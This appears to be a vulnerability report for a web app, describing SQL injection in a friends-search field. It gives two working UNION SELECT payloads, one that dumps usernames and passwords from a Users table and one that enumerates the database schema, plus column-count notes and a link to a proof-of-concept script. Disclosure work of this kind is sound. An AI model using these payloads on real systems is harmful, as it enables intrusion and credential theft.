# Vulnerability 1: SQL Injection in search friends allows to get any information from the database

- Vulnerability: SQL Injection
- Where: `search` field
- Impact: Allows to gather any information (that the db user has access) from the database

## Steps to reproduce

1. Register a user
2. Go to `My Friends`
3. Insert `nobody' UNION SELECT username, 1, password, 1, 1 FROM Users ORDER BY username # `
4. Results will be shown 1 per row

[(POC)](vuln1.py)

## Other payloads

To get all the tables in the database:
- `nonono' UNION SELECT table_name, 1, column_name, column_type, 1 FROM information_schema.columns #`

The only restriction is that the `UNION`ed `SELECT` needs to have 5 columns.
Column 2 (between `table_name` and `column_name`) is never displayed on the screen, and the last column is appended to `/static/photos/` and put in the `src` attribute of an `image` tag
